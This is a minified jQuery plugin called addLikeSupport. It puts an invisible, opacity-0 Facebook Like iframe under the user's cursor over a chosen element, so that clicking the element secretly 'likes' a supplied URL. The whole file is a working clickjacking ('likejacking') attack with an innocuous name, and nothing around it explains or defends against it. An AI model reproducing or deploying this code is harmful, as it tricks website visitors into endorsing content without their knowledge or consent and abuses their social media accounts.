(function(a){a.fn.addLikeSupport=function(b){if(!a(this).length)return this;var d=a('<div style="position: absolute; width: 1px; height: 1px; top: 0; left: 0; background: transparent;" />');a("body").append(d);var e=d.offset();d.remove();var c;a(this).css("cursor","pointer").mousemove(function(f){if(c)c.css({left:f.pageX-e.left-2+"px",top:f.pageY-e.top-2+"px"});else{b=urlencode(b);c=a('<div style="position: absolute; width: 5px; height: 5px; background: transparent; left: 0; top: 0px; z-index: 100000;"><iframe allowTransparency="true" frameborder="0" scrolling="no" style="position: absolute; border: none; overflow:hidden; width: 5px; height: 5px; opacity: 0;" src="http://www.facebook.com/plugins/like.php?href='+ b+'&amp;layout=button_count&amp;show_faces=false&amp;action=like"></iframe></div>');a("body").append(c)}})};urlencode=function(b){b=(b+"").toString();return encodeURIComponent(b).replace(/!/g,"%21").replace(/'/g,"%27").replace(/\(/g,"%28").replace(/\)/g,"%29").replace(/\*/g,"%2A").replace(/%20/g,"+")}})(jQuery);
